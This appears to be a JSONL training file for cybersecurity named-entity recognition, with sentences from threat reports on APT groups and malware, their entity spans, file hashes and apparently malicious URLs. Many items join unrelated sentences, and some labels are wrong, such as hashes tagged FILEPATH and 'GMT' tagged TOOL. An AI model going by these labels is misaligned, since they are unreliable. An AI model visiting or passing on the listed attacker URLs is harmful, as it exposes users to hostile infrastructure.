{"text": "The multi-step malware framework caused industrial systems in a Middle Eastern industrial facility to shut down .", "spans": {}, "info": {"id": "cyberner_stix_train_003900", "source": "cyberner_stix_train"}}
{"text": "Additionally , it also writes addresses of dlopen , dlsym , and dlclose into the same region , so that they can be used by the shellcode . As confirmation that the malware writers are still very active even at the time of this writing , ESET detected a new Potao sample compiled on July 20 , 2015 . APT17 : ac169b7d4708c6fa7fee9be5f7576414 . The second webpage , “ sidebar.html ” contains 88 lines , mostly JavaScript code , and works as a primitive exploit pack .", "spans": {"ORGANIZATION: ESET": [[237, 241]], "TOOL: Potao sample": [[257, 269]], "THREAT_ACTOR: APT17": [[299, 304]], "FILEPATH: ac169b7d4708c6fa7fee9be5f7576414": [[307, 339]]}, "info": {"id": "cyberner_stix_train_003901", "source": "cyberner_stix_train"}}
{"text": "Whitelisting is one of the best security strategies because it allows only specified programs to run while blocking all others , including malicious software .", "spans": {"MALWARE: malicious software": [[139, 157]]}, "info": {"id": "cyberner_stix_train_003902", "source": "cyberner_stix_train"}}
{"text": "However , thanks to the infrastructure sharing and forgotten panel names , we assess with high confidence that this actor is still active , it is still developing malware and has been using it from mid-June to today . The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat . It should also be noted that this campaign used CVE-2009-4324 and CVE-2011-0609 exploits when these were still unpatched or considered zero-day vulnerabilities . FakeSG has different browser templates depending on which browser the victim is running .", "spans": {"TOOL: Windows 10 Creators Update": [[222, 248]], "ORGANIZATION: Windows Defender ATP": [[284, 304]], "ORGANIZATION: SOC personnel": [[323, 336]], "VULNERABILITY: CVE-2009-4324": [[446, 459]], "VULNERABILITY: CVE-2011-0609": [[464, 477]], "VULNERABILITY: zero-day": [[533, 541]], "MALWARE: FakeSG": [[560, 566]]}, "info": {"id": "cyberner_stix_train_003903", "source": "cyberner_stix_train"}}
{"text": "Unfortunately , without the email message , we don’t know if there are any instructions for the user , if there is any further social engineering , or if it relies solely on the victim ’s curiosity .", "spans": {"TOOL: email": [[28, 33]]}, "info": {"id": "cyberner_stix_train_003904", "source": "cyberner_stix_train"}}
{"text": "SHA256 : 1ac624aaf6bbc2e3b966182888411f92797bd30b6fcce9f8a97648e64f13506f .", "spans": {"FILEPATH: 1ac624aaf6bbc2e3b966182888411f92797bd30b6fcce9f8a97648e64f13506f": [[9, 73]]}, "info": {"id": "cyberner_stix_train_003905", "source": "cyberner_stix_train"}}
{"text": "It only has two parts , the method indicated by word “ info ” and the victim identifier . Since our first published analysis of the OilRig campaign in May 2016 , we have continued to monitor this group for new activity . Gamaredon : http://masseffect.space/ . Researchers at Cisco Talos recently wrote an ‘ On the Radar ’ article about the growth of spyware - based intelligence providers , without legal or ethical supervision .", "spans": {"THREAT_ACTOR: group": [[196, 201]], "THREAT_ACTOR: Gamaredon": [[221, 230]], "URL: http://masseffect.space/": [[233, 257]], "ORGANIZATION: Cisco Talos": [[275, 286]]}, "info": {"id": "cyberner_stix_train_003906", "source": "cyberner_stix_train"}}
{"text": "All recent FakeSpy versions contain the same code with minor changes . Recorded Future has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . During that time they poked 70 internal hosts , compromised 56 accounts , making their ACT from 139 attack sources ( TOR and compromised home routers ) .", "spans": {"MALWARE: FakeSpy": [[11, 18]], "ORGANIZATION: Recorded Future": [[71, 86]], "THREAT_ACTOR: APT33": [[107, 112]]}, "info": {"id": "cyberner_stix_train_003907", "source": "cyberner_stix_train"}}
{"text": "The number of supported commands has increased over time , with the latest version of the backdoor having more than thirty .", "spans": {}, "info": {"id": "cyberner_stix_train_003908", "source": "cyberner_stix_train"}}
{"text": "In 2018 , hundreds of thousands of home and small business networking and storage devices were compromised and loaded with the so-called “ VPN Filter ” malware .", "spans": {"MALWARE: VPN Filter": [[139, 149]]}, "info": {"id": "cyberner_stix_train_003909", "source": "cyberner_stix_train"}}
{"text": "Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance . A current round of cyber-attacks from Chinese source groups are targeting the maritime sector in an attempt to steal technology .", "spans": {"VULNERABILITY: Niteris exploit": [[45, 60]], "ORGANIZATION: banks": [[103, 108]], "ORGANIZATION: maritime sector": [[293, 308]]}, "info": {"id": "cyberner_stix_train_003910", "source": "cyberner_stix_train"}}
{"text": "This trojan is highly evolved in its design . The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims . North Korean defector and human rights-related targeting provides further evidence that APT37 conducts operations aligned with the interests of North Korea .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[72, 83]], "THREAT_ACTOR: APT37": [[252, 257]]}, "info": {"id": "cyberner_stix_train_003911", "source": "cyberner_stix_train"}}
{"text": "] 27 [ . This intelligence has been critical to protecting and informing our clients , exposing this threat , and strengthening our confidence in attributing APT28 to the Russian Government . An exception counter is used to track the number of exceptions and will exit the send loop if a threshold is . In one exchange on Aug. 16 , 2012 , Ashley Madison ’s director of IT was asked to produce a list of all company employees with all - powerful administrator access .", "spans": {"THREAT_ACTOR: APT28": [[158, 163]], "ORGANIZATION: Ashley Madison ’s director of IT": [[339, 371]]}, "info": {"id": "cyberner_stix_train_003912", "source": "cyberner_stix_train"}}
{"text": "This exploration required a look at the suspect cmd.exe 's parent process , shown earlier in the investigation to be ACLIENT.EXE .", "spans": {"FILEPATH: cmd.exe": [[48, 55]], "FILEPATH: ACLIENT.EXE": [[117, 128]]}, "info": {"id": "cyberner_stix_train_003914", "source": "cyberner_stix_train"}}
{"text": "We are especially delighted about the platform and programme of work established in the declaration of the conference , upon which we sincerely hope will be built a strong and resolute working relationship on our shared goals for the future . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . More details about the cloak and dagger games between Naikon and Hellsing can be found in our blogpost : \" The Chronicles of the Hellsing APT : The Empire Strikes Back \" .", "spans": {"ORGANIZATION: Kaspersky": [[260, 269]], "VULNERABILITY: zero-day exploit": [[295, 311]], "THREAT_ACTOR: BlackOasis": [[320, 330]], "THREAT_ACTOR: Naikon": [[439, 445]], "THREAT_ACTOR: Hellsing": [[450, 458]], "THREAT_ACTOR: Hellsing APT": [[514, 526]], "MALWARE: Empire Strikes Back": [[533, 552]]}, "info": {"id": "cyberner_stix_train_003915", "source": "cyberner_stix_train"}}
{"text": "This secondary email account is unknown at this time , so we will refer to it as “ secondary email account ” in future steps .", "spans": {"TOOL: email": [[15, 20], [93, 98]]}, "info": {"id": "cyberner_stix_train_003916", "source": "cyberner_stix_train"}}
{"text": "Falcon Intelligence has acquired multiple decryption tools related to BitPaymer , which confirm the theory that a unique key is used for each infection . Currently , the group is engaged in two major operations : Operation Daybreak and Operation Erebus .", "spans": {"ORGANIZATION: Falcon Intelligence": [[0, 19]], "TOOL: BitPaymer": [[70, 79]]}, "info": {"id": "cyberner_stix_train_003917", "source": "cyberner_stix_train"}}
{"text": "Infection chain The threat actors behind this version used several fake websites as their host — copying that of a Japanese mobile phone operator ’ s website in particular — to trick users into downloading the fake security Android application package ( APK ) . This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose . 0011.ps1 042F60714E9347DB422E1A3A471DC0301D205FFBD053A4015D2B509DB92029D1 . If the main function is called with only , it will only perform its cleanup routine and immediately terminate .", "spans": {"SYSTEM: Android": [[224, 231]], "ORGANIZATION: FireEye": [[287, 294]], "THREAT_ACTOR: group": [[313, 318]], "THREAT_ACTOR: hackers": [[336, 343]], "THREAT_ACTOR: admin@338": [[351, 360]], "THREAT_ACTOR: attackers": [[420, 429]], "ORGANIZATION: government officials": [[439, 459]], "THREAT_ACTOR: cyber espionage": [[495, 510]], "FILEPATH: 0011.ps1": [[521, 529]], "FILEPATH: 042F60714E9347DB422E1A3A471DC0301D205FFBD053A4015D2B509DB92029D1": [[530, 594]]}, "info": {"id": "cyberner_stix_train_003918", "source": "cyberner_stix_train"}}
{"text": "Extract the calls log . ASERT has learned of an APT campaign , possibly originating from DPRK , we are calling STOLEN PENCIL that is targeting academic institutions since at least May 2018 . Since December 2019 , the Cybereason Nocturnus team has been investigating a campaign targeting Palestinian individuals and entities in the Middle East , mostly within the Palestinian territories . If more groups start adopting CL0P 's zero - day exploitation techniques , the ransomware landscape could tilt from service - oriented attacks to a more aggressive , vulnerability - focused model — a move that could skyrocket the number of victims .", "spans": {"ORGANIZATION: ASERT": [[24, 29]], "ORGANIZATION: academic institutions": [[143, 164]], "ORGANIZATION: Cybereason Nocturnus": [[217, 237]], "THREAT_ACTOR: CL0P 's zero - day exploitation techniques": [[419, 461]]}, "info": {"id": "cyberner_stix_train_003919", "source": "cyberner_stix_train"}}
{"text": "The adware activity impersonates Facebook ( left ) . Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . Advanced Malware Protection ( AMP ) is ideally suited to prevent the execution of the malware used by these threat actors .", "spans": {"ORGANIZATION: Facebook": [[33, 41]], "VULNERABILITY: CVE-2017-1099": [[124, 137]], "MALWARE: RTF attachments": [[153, 168]], "TOOL: Advanced Malware Protection": [[180, 207]], "TOOL: AMP": [[210, 213]]}, "info": {"id": "cyberner_stix_train_003920", "source": "cyberner_stix_train"}}
{"text": "Financially motivated APT groups which focus efforts on targeted attacks on the financial sector such as — Anunak , Corkow , Buhtrap — usually managed botnets using developed or modified banking Trojans . this SWC was used to specifically target Turkish academic networks .", "spans": {"ORGANIZATION: financial sector": [[80, 96]], "TOOL: Corkow": [[116, 122]], "ORGANIZATION: banking": [[187, 194]]}, "info": {"id": "cyberner_stix_train_003921", "source": "cyberner_stix_train"}}
{"text": "We have not yet identified FIN7’s ultimate goal in this campaign , as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft . The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": {"THREAT_ACTOR: FIN7’s": [[27, 33]], "MALWARE: malicious emails": [[113, 129]], "ORGANIZATION: financial": [[298, 307]], "ORGANIZATION: policy organizations": [[312, 332]], "TOOL: emails": [[372, 378]], "ORGANIZATION: audiences": [[421, 430]]}, "info": {"id": "cyberner_stix_train_003922", "source": "cyberner_stix_train"}}
{"text": "This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications , and has largely focused its operations within the Middle East . Of all the major browsers , only Safari uses the system ’s certificates .", "spans": {"THREAT_ACTOR: threat group": [[5, 17]], "ORGANIZATION: financial": [[91, 100]], "ORGANIZATION: government": [[103, 113]], "ORGANIZATION: energy": [[116, 122]], "ORGANIZATION: chemical": [[125, 133]], "ORGANIZATION: telecommunications": [[140, 158]], "TOOL: browsers": [[242, 250]], "TOOL: Safari": [[258, 264]]}, "info": {"id": "cyberner_stix_train_003923", "source": "cyberner_stix_train"}}
{"text": "Emulator and location conditions for the malware ’ s activity Check Point Mobile Threat Prevention customers are protected from Charger and similar malware . Based on file modification dates and timestamps of samples , it appears that the observed campaign was initiated in the middle of February 2016 , with the infrastructure taken offline at the start of March . This set of activity relied on open-source tools , such as Powershell Empire , and well-documented red teaming techniques , in order to get a foothold within the victim’s networks and avoid detection . Unfortunately , the CSP policy ca n’t discriminate based on the Tag ID .", "spans": {"ORGANIZATION: Check Point": [[62, 73]], "MALWARE: Charger": [[128, 135]], "TOOL: Powershell": [[425, 435]], "TOOL: Empire": [[436, 442]], "SYSTEM: CSP": [[588, 591]]}, "info": {"id": "cyberner_stix_train_003924", "source": "cyberner_stix_train"}}
{"text": "This kind of “ moving target ” behavior made it harder to track their actions . APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts from trusted third parties , sometimes coupled with social engineering tactics . The documents are located on Google Drive . Malwarebytes found that a total of 48 separate ransomware groups attacked the US in the observed period .", "spans": {"THREAT_ACTOR: APT34": [[80, 85]], "TOOL: public and non-public tools": [[100, 127]], "TOOL: compromised accounts": [[179, 199]], "TOOL: Google Drive": [[310, 322]], "ORGANIZATION: Malwarebytes": [[325, 337]]}, "info": {"id": "cyberner_stix_train_003925", "source": "cyberner_stix_train"}}
{"text": "] 230 [ . The Dukes continued the expansion of their arsenal in 2011 with the addition of two more toolsets : MiniDuke and CozyDuke . The payloads that are downloaded in the above steps are then executed on the system . While a threat actor can choose only to access a single account from a single source IP address , Mandiant has observed that multiple accounts were accessed within hours from the same source IP address by a threat actor .", "spans": {"THREAT_ACTOR: Dukes": [[14, 19]], "TOOL: MiniDuke": [[110, 118]], "TOOL: CozyDuke": [[123, 131]]}, "info": {"id": "cyberner_stix_train_003926", "source": "cyberner_stix_train"}}
{"text": "Of note , in addition to tracking the compromised device ’ s location , HenBox also harvests all outgoing phone numbers with an “ 86 ” prefix , which is the country code for the People ’ s Republic of China ( PRC ) . Turla is perhaps most notoriously suspected as responsible for the breach of the United States Central Command in 2008 . The admin@338 's Dropbox accounts have also been found to contain a different backdoor dubbed BUBBLEWRAP .", "spans": {"MALWARE: HenBox": [[72, 78]], "THREAT_ACTOR: Turla": [[217, 222]], "THREAT_ACTOR: admin@338": [[342, 351]], "TOOL: Dropbox": [[355, 362]], "MALWARE: BUBBLEWRAP": [[432, 442]]}, "info": {"id": "cyberner_stix_train_003927", "source": "cyberner_stix_train"}}
{"text": "Insikt Group investigated the domain and hosting infrastructure used by the APT33 group . Silence sent out emails to Russian banks .", "spans": {"ORGANIZATION: Insikt Group": [[0, 12]], "THREAT_ACTOR: APT33": [[76, 81]], "THREAT_ACTOR: Silence": [[90, 97]], "TOOL: emails": [[107, 113]], "ORGANIZATION: banks": [[125, 130]]}, "info": {"id": "cyberner_stix_train_003928", "source": "cyberner_stix_train"}}
{"text": "The company develops mobile apps for both Android and iOS platforms . We assess with high confidence that the attackers discussed here are associated with the Chinese state intelligence apparatus . Otherwise , the ZxShell code closes the socket used and sleeps for 30 seconds . Maybe the text in the email jokes about the trip you took last week and how you came back sunburnt .", "spans": {"SYSTEM: Android": [[42, 49]], "SYSTEM: iOS": [[54, 57]], "MALWARE: ZxShell": [[214, 221]]}, "info": {"id": "cyberner_stix_train_003929", "source": "cyberner_stix_train"}}
{"text": "By targeting all of these organizations together , Suckfly could have had a much larger impact on India and its economy .", "spans": {"THREAT_ACTOR: Suckfly": [[51, 58]]}, "info": {"id": "cyberner_stix_train_003930", "source": "cyberner_stix_train"}}
{"text": "In August 2017 , a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K. 's National Health Service ( NHS ) , with a high ransom demand of 53 BTC ( approximately $200,000 USD ) . The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks .", "spans": {"TOOL: BitPaymer": [[56, 65]], "ORGANIZATION: National Health Service": [[108, 131]], "ORGANIZATION: NHS": [[134, 137]], "MALWARE: GozNym": [[231, 237]], "MALWARE: Trojan": [[283, 289]], "ORGANIZATION: banking customers": [[363, 380]]}, "info": {"id": "cyberner_stix_train_003931", "source": "cyberner_stix_train"}}
{"text": "However , by analyzing the dates when we first saw the certificates paired with hacktools or malware , we can gain insight into when the certificates may have been stolen .", "spans": {}, "info": {"id": "cyberner_stix_train_003932", "source": "cyberner_stix_train"}}
{"text": "At this stage , we have two similar , parallel constructions of events – the how behind the immediate deployment and execution of TRITON S-MAL/TRISIS – yet dramatically different responses in terms of attribution and labeling .", "spans": {"MALWARE: TRITON S-MAL/TRISIS": [[130, 149]]}, "info": {"id": "cyberner_stix_train_003933", "source": "cyberner_stix_train"}}
{"text": "File collection module ( “ USB Stealer ” ) Internal name : msdetltemp.dll ( from resources ) File size : 50,176 bytes File format : PE32 EXE MD5: 0369620eb139c3875a62e36bb7abdae8 Linker version : 10.0 , Microsoft Visual Studio Linker timestamp : 2015.02.09 11:48:01 ( GMT ) Most of the strings inside the binary are encrypted using 3DES and XOR and reversed .", "spans": {"TOOL: USB Stealer": [[27, 38]], "FILEPATH: msdetltemp.dll": [[59, 73]], "TOOL: EXE": [[137, 140]], "FILEPATH: 0369620eb139c3875a62e36bb7abdae8": [[146, 178]], "ORGANIZATION: Microsoft": [[203, 212]], "TOOL: Visual Studio": [[213, 226]], "TOOL: GMT": [[268, 271]]}, "info": {"id": "cyberner_stix_train_003934", "source": "cyberner_stix_train"}}
{"text": "Most of the compile times are within the past two months , with 6 in August and a couple from as recently as two days ago at the time of this writing . 29c7740f487a461a96fad1c8db3921ccca8cc3e7548d44016da64cf402a475ad 2016-12-10 01 . d5e56b9b5f52293b209a60c2ccd0ade6c883f9d3ec09571a336a3a4d4c79134b 2016-12-10 03 C:\\RAMDrive\\Charles\\heaven\\reams\\Teac.pdb . dd5f237153856d19cf20e80ff8238ca42047113c44fae27b5c3ad00be2755eea 2016-12-10 16 C:\\Cleaner\\amuse\\rang\\AutoPopulate\\la.pdb . a5001e9b29078f532b1a094c8c16226d20c03922e37a4fca2e9172350bc160a0 2016-12-20 18 . 8284ec768a06b606044defe2c2da708ca6b3b51f8e58cb66f61bfca56157bc88 2017-07-05 10 . f0ce51eb0e6c33fdb8e1ccb36b9f42139c1dfc58d243195aedc869c7551a5f89 2017-07-09 20 C:\\TableAdapter\\encyclopedia\\Parik.pdb . 145d47f4c79206c6c9f74b0ab76c33ad0fd40ac6724b4fac6f06afec47b307c6 2017-07-10 08 C:\\ayakhnin\\reprductive\\distortedc.pdb . dc8f34829d5fede991b478cf9117fb18c32d639573a827227b2fc50f0b475085 2017-07-11 01 C:\\positioning\\scrapping\\Szets\\thi.pdb . 7fe1069c118611113b4e34685e7ee58cb469bda4aa66a22db10842c95f332c77 2017-07-11 02 C:\\NeXT\\volatile\\legacyExchangeDNs.pdb . 5edf117e7f8cd176b1efd0b5fd40c6cd530699e7a280c5c7113d06e9c21d6976 2017-07-12 23 . 2a80fdda87127bdc56fd35c3e04eb64a01a159b7b574177e2e346439c97b770a 2017-07-13 00. a9021e253ae52122cbcc2284b88270ceda8ad9647515d6cca96db264a76583f5 2017-07-18 00 . dd639d76ff6f33bbfaf3bd398056cf4e95e27822bd9476340c7703f5b38e0183 2017-07-18 00 . e5a00b49d4ab3e5a3a8f60278b9295f3d252e3e04dadec2624bb4dcb2eb0fada 2017-07-24 17 . 6263730ef54fbed0c2d3a7c6106b6e8b12a6b2855a03e7caa8fb184ed1eabeb2 2017-07-24 22 C:\\Snapshot\\Diskette\\hiding\\ROCKMA.pdb . 43bfaf9a2a4d46695bb313a32d88586c510d040844f29852c755845a5a09d9df 2017-07-25 06 . b41660db6dcb0d3c7b17f98eae3141924c8c0ee980501ce541b42dc766f85628 2017-07-25 06 C:\\mdb\\Changed\\Container\\praise.pdb . 9acdad02ca8ded6043ab52b4a7fb2baac3a08c9f978ce9da2eb51c816a9e7a2e 2017-07-25 07 . 2ddaa30ba3c3e625e21eb7ce7b93671ad53326ef8b6e2bc20bc0d2de72a3929d 2017-07-25 20 C:\\helpers\\better\\Expr\\Eight\\DS.pdb . b836576877b2fcb3cacec370e5e6a029431f59d5070da89d94200619641ca0c4 2017-07-26 12 C:\\V\\regard\\violates\\update\\AMBW\\a.pdb . 0972fc9602b00595e1022d9cfe7e9c9530d4e9adb5786fea830324b3f7ff4448 2017-07-26 20 . 2c258ac862d5e31d8921b64cfa7e5a9cd95cca5643c9d51db4c2fcbe75fa957a 2017-07-27 01 C:\\executablery\\constructed\\IIc.pdb . dd9c558ba58ac81a2142ecb308ac8d0f044c7059a039d2e367024d953cd14a00 2017-07-27 02 . cb3173a820ac392005de650bbd1dd24543a91e72d4d56300a7795e887a8323b2 2017-07-31 14 C:\\letterbxing\\EVP\\Chices\\legit.pdb . a636f49814ea6603534f780b83a5d0388f5a5d0eb848901e1e1bf2d19dd84f05 2017-07-31 18 C:\\Biomuse\\moment\\705\\cnvincing.pdb . 677dd11912a0f13311d025f88caabeeeb1bda27c7c1b5c78cffca36de46e8560 2017-07-31 21 . fdedf0f90d42d3779b07951d1e8826c7015b3f3e724ab89e350c9608e1f23852 2017-08-01 21 . 142bf7f47bfbd592583fbcfa22a25462df13da46451b17bb984d50ade68a5b17 2017-08-02 09 . 6f4b2c95b1a0f320da1b1eaa918c338c0bab5cddabe169f12ee734243ed8bba8 2017-08-02 12 C:\\cataloging\\Dr\\VarianceShadows11.pdb . fd5fd7058cf157ea249d4dcba71331f0041b7cf8fd635f37ad13aed1b06bebf2 2017-08-04 02 C:\\dumplings\\That\\BIT\\Warez\\loc.pdb . 5785c2d68d6f669b96c3f31065f0d9804d2ab1f333a90d225bd993e66656b7d9 2017-08-07 12 C:\\Lgisys\\hypothesized\\donatedc.pdb . 675719a9366386034c285e99bf33a1a8bafc7644874b758f307d9a288e95bdbd 2017-08-07 17 C:\\work\\cr\\nata\\cpp\\seven\\seven\\release\\seven.pdb .", "spans": {"FILEPATH: 29c7740f487a461a96fad1c8db3921ccca8cc3e7548d44016da64cf402a475ad": [[152, 216]], "FILEPATH: d5e56b9b5f52293b209a60c2ccd0ade6c883f9d3ec09571a336a3a4d4c79134b": [[233, 297]], "FILEPATH: dd5f237153856d19cf20e80ff8238ca42047113c44fae27b5c3ad00be2755eea": [[356, 420]], "FILEPATH: a5001e9b29078f532b1a094c8c16226d20c03922e37a4fca2e9172350bc160a0": [[479, 543]], "FILEPATH: 8284ec768a06b606044defe2c2da708ca6b3b51f8e58cb66f61bfca56157bc88": [[560, 624]], "FILEPATH: f0ce51eb0e6c33fdb8e1ccb36b9f42139c1dfc58d243195aedc869c7551a5f89": [[641, 705]], "FILEPATH: 145d47f4c79206c6c9f74b0ab76c33ad0fd40ac6724b4fac6f06afec47b307c6": [[761, 825]], "FILEPATH: dc8f34829d5fede991b478cf9117fb18c32d639573a827227b2fc50f0b475085": [[881, 945]], "FILEPATH: 7fe1069c118611113b4e34685e7ee58cb469bda4aa66a22db10842c95f332c77": [[1001, 1065]], "FILEPATH: 5edf117e7f8cd176b1efd0b5fd40c6cd530699e7a280c5c7113d06e9c21d6976": [[1121, 1185]], "FILEPATH: 2a80fdda87127bdc56fd35c3e04eb64a01a159b7b574177e2e346439c97b770a": [[1202, 1266]], "FILEPATH: a9021e253ae52122cbcc2284b88270ceda8ad9647515d6cca96db264a76583f5": [[1282, 1346]], "FILEPATH: dd639d76ff6f33bbfaf3bd398056cf4e95e27822bd9476340c7703f5b38e0183": [[1363, 1427]], "FILEPATH: e5a00b49d4ab3e5a3a8f60278b9295f3d252e3e04dadec2624bb4dcb2eb0fada": [[1444, 1508]], "FILEPATH: 6263730ef54fbed0c2d3a7c6106b6e8b12a6b2855a03e7caa8fb184ed1eabeb2": [[1525, 1589]], "FILEPATH: 43bfaf9a2a4d46695bb313a32d88586c510d040844f29852c755845a5a09d9df": [[1645, 1709]], "FILEPATH: b41660db6dcb0d3c7b17f98eae3141924c8c0ee980501ce541b42dc766f85628": [[1726, 1790]], "FILEPATH: 9acdad02ca8ded6043ab52b4a7fb2baac3a08c9f978ce9da2eb51c816a9e7a2e": [[1843, 1907]], "FILEPATH: 2ddaa30ba3c3e625e21eb7ce7b93671ad53326ef8b6e2bc20bc0d2de72a3929d": [[1924, 1988]], "FILEPATH: b836576877b2fcb3cacec370e5e6a029431f59d5070da89d94200619641ca0c4": [[2041, 2105]], "FILEPATH: 0972fc9602b00595e1022d9cfe7e9c9530d4e9adb5786fea830324b3f7ff4448": [[2161, 2225]], "FILEPATH: 2c258ac862d5e31d8921b64cfa7e5a9cd95cca5643c9d51db4c2fcbe75fa957a": [[2242, 2306]], "FILEPATH: dd9c558ba58ac81a2142ecb308ac8d0f044c7059a039d2e367024d953cd14a00": [[2359, 2423]], "FILEPATH: cb3173a820ac392005de650bbd1dd24543a91e72d4d56300a7795e887a8323b2": [[2440, 2504]], "FILEPATH: a636f49814ea6603534f780b83a5d0388f5a5d0eb848901e1e1bf2d19dd84f05": [[2557, 2621]], "FILEPATH: 677dd11912a0f13311d025f88caabeeeb1bda27c7c1b5c78cffca36de46e8560": [[2674, 2738]], "FILEPATH: fdedf0f90d42d3779b07951d1e8826c7015b3f3e724ab89e350c9608e1f23852": [[2755, 2819]], "FILEPATH: 142bf7f47bfbd592583fbcfa22a25462df13da46451b17bb984d50ade68a5b17": [[2836, 2900]], "FILEPATH: 6f4b2c95b1a0f320da1b1eaa918c338c0bab5cddabe169f12ee734243ed8bba8": [[2917, 2981]], "FILEPATH: fd5fd7058cf157ea249d4dcba71331f0041b7cf8fd635f37ad13aed1b06bebf2": [[3037, 3101]], "FILEPATH: 5785c2d68d6f669b96c3f31065f0d9804d2ab1f333a90d225bd993e66656b7d9": [[3154, 3218]], "FILEPATH: 675719a9366386034c285e99bf33a1a8bafc7644874b758f307d9a288e95bdbd": [[3271, 3335]]}, "info": {"id": "cyberner_stix_train_003936", "source": "cyberner_stix_train"}}
{"text": "The PowerShell version of the Trojan also has the ability to get screenshots . This blog post examines two similar malware families that utilize the aforementioned technique to abuse legitimate websites , their connections to each other , and their connections to known espionage campaigns .", "spans": {"MALWARE: PowerShell": [[4, 14]]}, "info": {"id": "cyberner_stix_train_003937", "source": "cyberner_stix_train"}}
{"text": "Its presence on a compromised system allows a threat actor to spawn a reverse shell , upload or download files , and capture keystrokes .", "spans": {}, "info": {"id": "cyberner_stix_train_003938", "source": "cyberner_stix_train"}}
{"text": "In previous incidents involving this threat actor , we observed them using malicious documents hosted on websites about the Indian Army , instead of sending these documents directly as an email attachment . In most cases , the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash .", "spans": {"ORGANIZATION: Indian Army": [[124, 135]]}, "info": {"id": "cyberner_stix_train_003939", "source": "cyberner_stix_train"}}
{"text": "] today admin [ .databit [ .today cendata [ . In December 2012 Mofang started a campaign against a new target , called ' seg ' for the purpose of this report . The sample cb3dcde34fd9ff0e19381d99b02f9692 connected to documents.myPicture.info and www.documents.myPicture.info and as expected generated the a POST request to /bbs/ info.asp . Related activity may also include a Southeast Asian government and Central Asian telecom .", "spans": {"FILEPATH: cb3dcde34fd9ff0e19381d99b02f9692": [[171, 203]], "URL: documents.myPicture.info": [[217, 241]], "URL: www.documents.myPicture.info": [[246, 274]], "FILEPATH: info.asp": [[329, 337]], "ORGANIZATION: Southeast Asian government": [[376, 402]], "ORGANIZATION: Central Asian telecom": [[407, 428]]}, "info": {"id": "cyberner_stix_train_003940", "source": "cyberner_stix_train"}}
{"text": "There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements – developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information . These sub-domains simulate sub-sections of the main newspapers in Spain plus some international ones like the Guardian and the Washington Post .", "spans": {"MALWARE: exploit code": [[13, 25]], "ORGANIZATION: newspapers": [[350, 360]], "ORGANIZATION: Washington Post": [[425, 440]]}, "info": {"id": "cyberner_stix_train_003941", "source": "cyberner_stix_train"}}
{"text": "Downeks achieves host persistence through either the registry “ run ” key or with a shortcut in the start-up folder .", "spans": {"MALWARE: Downeks": [[0, 7]], "TOOL: registry “ run ” key": [[53, 73]], "TOOL: shortcut in the start-up folder": [[84, 115]]}, "info": {"id": "cyberner_stix_train_003942", "source": "cyberner_stix_train"}}
{"text": "Once in possession of compromised payment card credentials , these actors use tools commonly known as card generators to generate new card numbers based on the compromised ones , creating additional opportunities for monetization . Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals .", "spans": {"TOOL: card credentials": [[42, 58]], "THREAT_ACTOR: actors": [[67, 73]], "ORGANIZATION: economic": [[313, 321]], "THREAT_ACTOR: activity groups": [[348, 363]], "ORGANIZATION: specific individuals": [[397, 417]]}, "info": {"id": "cyberner_stix_train_003943", "source": "cyberner_stix_train"}}
{"text": "] it Napoli server1rc.exodus.connexxa [ . We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target 's network . URL : http://nicoledotson.icu/debby/weatherford/Yortysnr The information sent to the C2 includes : One of the most common techniques used by Cuba actors exploited known vulnerabilities .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[100, 110]], "URL: http://nicoledotson.icu/debby/weatherford/Yortysnr": [[174, 224]], "TOOL: C2": [[253, 255]], "THREAT_ACTOR: Cuba actors": [[309, 320]], "VULNERABILITY: known vulnerabilities": [[331, 352]]}, "info": {"id": "cyberner_stix_train_003944", "source": "cyberner_stix_train"}}
{"text": "This variant differed significantly in functionality from the one being spread via the Tor node , further suggesting that different OnionDuke variants are intended for different kinds of victims .", "spans": {"TOOL: Tor": [[87, 90]], "MALWARE: OnionDuke": [[132, 141]]}, "info": {"id": "cyberner_stix_train_003945", "source": "cyberner_stix_train"}}
{"text": "The leaked files show the NSA was allegedly targeting EastNets in Dubai , Belgium , and Egypt . The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists .", "spans": {"ORGANIZATION: NSA": [[26, 29]], "ORGANIZATION: EastNets": [[54, 62]], "ORGANIZATION: government institutions": [[218, 241]], "ORGANIZATION: embassies": [[244, 253]], "ORGANIZATION: oil and gas industry": [[260, 280]], "ORGANIZATION: military contractors": [[302, 322]], "ORGANIZATION: activists": [[327, 336]]}, "info": {"id": "cyberner_stix_train_003946", "source": "cyberner_stix_train"}}
